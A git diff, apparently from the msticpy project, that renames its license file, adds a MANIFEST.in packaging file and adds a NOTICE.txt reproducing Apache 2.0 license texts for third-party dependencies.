+Brilliantly written and performed by [@lemonsaurus_rex](https://twitter.com/lemonsaurus_rex)
diff --git a/LICENSE.TXT b/LICENSE
similarity index 92%
rename from LICENSE.TXT
rename to LICENSE
index 3826ed060..4c027eea3 100644
--- a/LICENSE.TXT
+++ b/LICENSE
@@ -1,4 +1,6 @@
-msticpy Copyright (c) Microsoft Corporation. All rights reserved.
+MIT License
+
+Copyright (c) Microsoft Corporation. All rights reserved.
 
 MIT License Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to deal
@@ -16,4 +18,4 @@ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-SOFTWARE
\ No newline at end of file
+SOFTWARE
diff --git a/MANIFEST.in b/MANIFEST.in
new file mode 100644
index 000000000..51d99502e
--- /dev/null
+++ b/MANIFEST.in
@@ -0,0 +1,8 @@
+include msticpy/data/queries/*.yaml
+include msticpy/msticpyconfig.yaml
+include msticpy/resources/*
+include requirements.txt
+include requirements-dev.txt
+include requirements-all.txt
+include README.md
+recursive-exclude tests *
diff --git a/NOTICE.txt b/NOTICE.txt
new file mode 100644
index 000000000..e8ade15df
--- /dev/null
+++ b/NOTICE.txt
@@ -0,0 +1,6345 @@
+NOTICES AND INFORMATION
+Do Not Translate or Localize
+
+This software incorporates material from third parties.
+Microsoft makes certain open source code available at https://3rdpartysource.microsoft.com,
+or you may send a check or money order for US $5.00, including the product name,
+the open source component name, platform, and version number, to:
+
+Source Code Compliance Team
+Microsoft Corporation
+One Microsoft Way
+Redmond, WA 98052
+USA
+
+Notwithstanding any other terms, you may reverse engineer this software to the extent
+required to debug changes to any libraries licensed under the GNU Lesser General Public License.
+
+---------------------------------------------------------
+
+aiosignal 1.2.0 - Apache-2.0
+
+
+copyright 2013-2019
+Copyright 2013-2019 Nikolay Kim and Andrew Svetlov
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+argcomplete 2.0.0 - Apache-2.0
+
+
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+asynctest 0.13.0 - Apache-2.0
+
+
+Copyright 2015 Martin Richard
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+async-timeout 4.0.2 - Apache-2.0
+
+
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+bleach 4.1.0 - Apache-2.0
+
+
+Copyright (c) 2014-2017, Mozilla Foundation
+copyright u'2012-2015, James Socol 2015-2017, Mozilla Foundation
+
+Apache License
+
+Version 2.0, January 2004
+
